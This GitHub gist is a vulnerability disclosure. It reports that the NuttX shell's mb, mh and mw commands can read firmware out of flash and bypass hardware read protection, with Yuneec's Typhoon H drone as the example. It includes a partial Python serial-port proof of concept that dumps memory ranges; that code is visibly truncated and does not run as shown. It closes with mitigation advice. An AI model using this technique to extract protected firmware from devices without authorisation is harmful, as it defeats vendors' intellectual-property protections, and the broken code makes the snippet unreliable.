Skip to content

Instantly share code, notes, and snippets.

Last active March 8, 2021 09:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save swkim101/f473b9a60e6d4635268402a2cd2025ac to your computer and use it in GitHub Desktop.
Save swkim101/f473b9a60e6d4635268402a2cd2025ac to your computer and use it in GitHub Desktop.

Nsh's mb, mh, and mw commands are dangerous.

Exploiting those commands makes it possible to extract firmware from the flash memory because mb, mh, and mw can read the firmware code at an arbitrary location. You may know that some commercial vendors can customize the firmware without opening even binary code. However, those commands can neutralize the intellectual protection scheme to prevent from reading binary firmware code.

For instance, Yuneec, a commercial drone vendor, has sold multiple drone models such as Typhoon H. Meanwhile, the mb 0x8000000 command naively prints Typhoon H's firmware binary code.
FYI, the drone vendor has made efforts to protect its firmware from reading out, applying ST's hardware read protection to its drones.
Nevertheless, Nuttx's commands unintentionally help to bypass the protection scheme.

PoC is as follows:

import serial
ser = serial.Serial(
f = open('output_db000.txt', 'wb')
for addr in range(0x080db000, 0x08200000, 0x1000):
   count = 0
   ser.write(b'mw ')
   ser.write(bytes(hex(addr), 'ascii'))
   ser.write(b' 1000\r\n')
   while True:
       line = ser.readline()
       if(len(line) <= 5 and count != 0):
       count += 1

Only if possible, we believe the best way to prevent this vulnerability is to remove mb, mh, and mw commands. If that is not allowed due to debugging purpose, we would like to suggest the following actions can help protect intellectual properties from this vulnerability:
(1) please add comments in the source code.
(2) please show warnings in compile messages.
(3) please disable those commands in the default configuration (CONFIG_NSH_DISABLE_MW=y)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment